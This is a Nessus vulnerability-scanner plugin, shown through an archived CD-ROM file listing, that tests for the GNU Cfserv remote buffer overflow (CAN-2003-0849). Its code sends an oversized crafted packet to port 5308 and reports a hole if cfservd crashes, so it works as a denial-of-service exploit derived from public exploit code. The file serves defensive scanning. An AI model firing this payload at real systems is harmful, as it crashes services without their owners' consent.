home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / gnu_cfserv.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  76 lines

  1. # script based on exploit code by
  2. # kokaninATdtors.net
  3.  
  4. if(description)
  5. {
  6.  script_id(11893);
  7.  script_bugtraq_id(8699);
  8.  script_version("$Revision: 1.5 $");
  9.  script_cve_id("CAN-2003-0849");
  10.  
  11.  name["english"] = "Gnu Cfserv remote buffer overflow";
  12.  
  13.  script_name(english:name["english"]);
  14.  
  15.  desc["english"] = "
  16. The remote Cfserver seems to be vulnerable to a remote buffer overflow bug.
  17. Such a bug might be exploited by an attacker to execute arbitrary code on
  18. this host, with the privileges cfservd is running with.
  19.  
  20.   
  21. Solution : upgrade to version 2.0.8/2.0.8p1
  22. See also : http://www.iu.hio.no/cfengine/
  23. Risk factor : High";
  24.  
  25.  script_description(english:desc["english"]);
  26.  
  27.  summary["english"] = "Checks for the Cfserver remote buffer overflow";
  28.  
  29.  script_summary(english:summary["english"]);
  30.  
  31.  script_category(ACT_DESTRUCTIVE_ATTACK);
  32.  
  33.  
  34.  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
  35.  family["english"] = "Gain root remotely";
  36.  script_family(english:family["english"]);
  37.  script_dependencie("find_service.nes");
  38.  
  39.  exit(0);
  40. }
  41.  
  42.  
  43. # start script code
  44.  
  45. include("misc_func.inc");
  46.  
  47. port = 5308;
  48. if (!get_port_state(port)) exit(0);
  49.  
  50.  
  51.  
  52. req = hex2raw(s: tolower("32647564656475646564756465647564656475646509322F6173646661736466617464666173646661736466433A5C096C6F63616C686F73742E6C6F63616C646F6D61696E2E636F6D093730092D0D0A2E0D0A"));                         
  53. req += crap(3500);
  54.  
  55.  
  56. soc = open_sock_tcp(port);
  57. if (!soc) exit(0);
  58. send (socket:soc, data:req);     
  59. close(soc);
  60. sleep(1);
  61. soc = open_sock_tcp(port);
  62. if (!soc) security_hole(port);
  63. exit(0);
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76.